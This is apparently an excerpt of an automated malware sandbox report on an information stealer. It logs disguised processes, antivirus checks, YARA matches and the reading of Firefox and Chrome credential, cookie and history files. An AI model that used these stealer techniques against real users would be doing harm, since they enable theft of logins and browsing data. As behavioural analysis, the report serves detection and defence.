Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E380F6 cpuid 0_2_05E380F6
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_05E50AB6
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00438178
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00440116
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004382A2
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 1_2_0043834F
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 1_2_00438423
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: EnumSystemLocalesW, 1_2_004387C8
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: GetLocaleInfoW, 1_2_0043884E
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW, 1_2_00437BB3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: EnumSystemLocalesW, 1_2_00437E27
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437E83
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437F00
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00437F83
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_05E20AB6
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 4_2_00438178
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_00440116
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_004382A2
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 4_2_0043834F
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 4_2_00438423
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: EnumSystemLocalesW, 4_2_004387C8
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: GetLocaleInfoW, 4_2_0043884E
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 4_2_00437BB3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: EnumSystemLocalesW, 4_2_00437E27
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 4_2_00437E83
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 4_2_00437F00
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 4_2_00437F83
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_00408AF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00408AF4
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_0042FE47
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: build2.exe, 00000008.00000002.1967987129.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000913000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2348561919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3584250955.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2974032073.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3583753662.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4129162040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2350347697.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2973232719.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2019239112.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1913660685.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1916720423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 8.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.build2.exe.35615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.build2.exe.35615a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1966489860.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1787690913.0000000003560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: build2.exe PID: 7584, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build2.exe PID: 7600, type: MEMORYSTR
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json Jump to behavior
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4 Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.ico Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4 Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\LOG.old Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4 Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pb Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: Yara match File source: Process Memory Space: build2.exe PID: 7600, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 8.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.build2.exe.35615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.build2.exe.35615a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1966489860.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1787690913.0000000003560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: build2.exe PID: 7584, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build2.exe PID: 7600, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs